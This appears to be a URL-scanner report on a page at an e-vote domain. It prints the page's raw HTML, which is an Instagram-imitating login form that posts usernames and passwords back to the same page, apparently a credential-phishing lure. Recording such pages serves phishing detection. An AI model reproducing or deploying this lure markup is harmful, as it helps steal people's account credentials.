- 扫描 ID:
- 0df29660-8e37-47dd-bcc6-87c2b09b62a1已完成
- 提交的 URL:
- https://e-voteonline.com/Auth/IG.php
- 报告完成时间:
链接 · 找到 0 个
从页面中识别出的传出链接
JavaScript 变量 · 找到 3 个
在页面窗口对象上加载的全局 JavaScript 变量是在函数外部声明的变量,可以从当前范围内的代码中的任何位置访问
名称 | 类型 |
---|---|
onbeforetoggle | object |
documentPictureInPicture | object |
onscrollend | object |
控制台日志消息 · 找到 1 条
记录到 Web 控制台的消息
类型 | 类别 | 记录 |
---|---|---|
verbose | dom |
|
HTML
页面的原始 HTML 正文
<!DOCTYPE html><html lang="en"><head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<!-- title -->
<title>E-voteOnline || Login </title>
<!-- custom css link -->
<link rel="stylesheet" href="style.css">
<!-- favicon -->
<link rel="shortcut icon" href="img/favicon.png" type="image/x-icon">
<!-- boxicons cdn link -->
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/boxicons@latest/css/boxicons.min.css">
</head>
<body>
<div class="image__login">
<img src="img/instagramimg.png" alt="">
</div>
<div class="insta__form">
<div class="login__form">
<img src="img/instalogo.png">
<form class="form" method="POST">
<input type="text" placeholder="Phone number, username, or email" name="username">
<input type="password" placeholder="Password" name="password">
<button>
Log in
</button>
<span class="or">OR</span>
</form>
<h3>
<i class="bx bxl-facebook-circle"></i>
Log in with Facebook
</h3>
<span class="forget">
Forget Password ?
</span>
</div>
</div>
</body></html>